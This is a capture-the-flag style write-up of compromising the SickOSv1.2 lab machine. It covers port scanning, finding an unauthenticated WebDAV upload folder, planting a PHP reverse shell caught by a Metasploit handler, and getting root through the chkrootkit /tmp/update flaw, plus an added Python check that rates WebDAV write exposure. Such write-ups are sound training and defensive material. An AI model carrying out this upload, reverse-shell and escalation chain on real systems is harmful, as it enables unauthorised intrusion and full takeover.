# B2R: SickOSv1.2

## Executive Summary

This machine had an unprotected folder which allowed uploading of malicious PHP code which could then be executed remotely. An attacker could then create an unprivileged shell on the victim machine and begin to explore the system for additional vulnerabilities which could lead to a full compromise. During the exploration, an outdated version of chkrootkit was found. By exploiting a known vulnerability in the way chkrootkit parses arguments, an attacker could create a malicious file that would later be run by chkrootkit as a fully privileged user.

## Tools used

• nmap - discovery
• uniscan - web application scanner
• metasploit - exploit framework
• local-linux-enum script - enumeration

## Proof of Concept

In order to cut down on typing, once the IP of the victim machine is discovered, it can be added to /etc/hosts.

echo "192.168.1.188 vm" >> /etc/hosts


We begin by scanning the victim's machine and find ports 80 and 22 open.

❯❯ nmap -p - -A vm | tee nmap.scan


Navigating to the page and checking its source code reveals nothing of interest.

Running uniscan reveals a folder named test.

❯❯ uniscan -qweds -u http://vm/


The listing appeared to be empty, but further examination of the /test path revealed that it responded to more than the standard HTTP methods: COPY and MOVE indicated WebDAV support.

❯❯ curl -vX OPTIONS vm/test


This path requires no authentication and thus allows attackers to upload files to the web server.
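A check for this kind of exposure on servers you administer, added here as an example (it is not code from the original writeup): it parses a captured OPTIONS response, such as the one `curl -vX OPTIONS` prints, and rates the path by the WebDAV write methods it advertises and whether the server issued an authentication challenge. The two sample responses are constructed, not captured from the lab machine.

```python
# Added example for this writeup (not from the original post): classify a raw HTTP
# OPTIONS response (e.g. captured with `curl -vX OPTIONS`) by advertised WebDAV write access.
from typing import Dict, Tuple

# WebDAV / HTTP methods that let a client modify content on the server.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status code, lower-cased header map)."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    lines = [ln for ln in head.split("\n") if ln]
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers

def assess_webdav(raw: str) -> Dict[str, object]:
    """'high' = DAV with write methods and no auth challenge; 'medium' = DAV writes behind a challenge."""
    status, headers = parse_response(raw)
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    dav_enabled = "dav" in headers or bool(allowed & {"PROPFIND", "COPY", "MOVE"})
    writable = sorted(allowed & WRITE_METHODS)
    challenged = status in (401, 403) or "www-authenticate" in headers
    if dav_enabled and writable and not challenged:
        risk = "high"
    elif dav_enabled and writable:
        risk = "medium"
    else:
        risk = "low"
    return {"status": status, "dav": dav_enabled, "write_methods": writable,
            "auth_challenge": challenged, "risk": risk}

# Constructed sample responses (not captured from the lab machine).
OPEN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "DAV: 1,2\r\n"
    "Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,PUT,LOCK,UNLOCK\r\n"
    "Content-Length: 0\r\n\r\n"
)
PROTECTED_RESPONSE = (
    "HTTP/1.1 401 Authorization Required\r\n"
    "Server: Apache\r\n"
    'WWW-Authenticate: Basic realm="WebDAV"\r\n'
    "Content-Length: 0\r\n\r\n"
)
```

A 200 to OPTIONS only proves the methods are advertised; a server that restricts just the write methods (for example Apache's LimitExcept) answers OPTIONS without a challenge, so treat a "high" rating as a prompt to review the server configuration rather than as proof.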

Having uploaded the reverse shell (sshhh.php), we set up the Meterpreter handler in msfconsole. LHOST is the attacker's address (shown as a placeholder) and the listener is bound to port 80.

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 80
run -j


Requesting the uploaded file executes it and the session connects back to the handler.

curl http://vm/test/sshhh.php

The installed version of chkrootkit is outdated and vulnerable to a known code-execution flaw.

Using Metasploit, we create another handler and payload with the chkrootkit local exploit module (exploit/unix/local/chkrootkit). This module creates or overwrites the /tmp/update file with the reverse TCP shell of your choosing. The next time chkrootkit runs, which it does as root, that update file is executed and connects back to the attacker computer designated in the payload.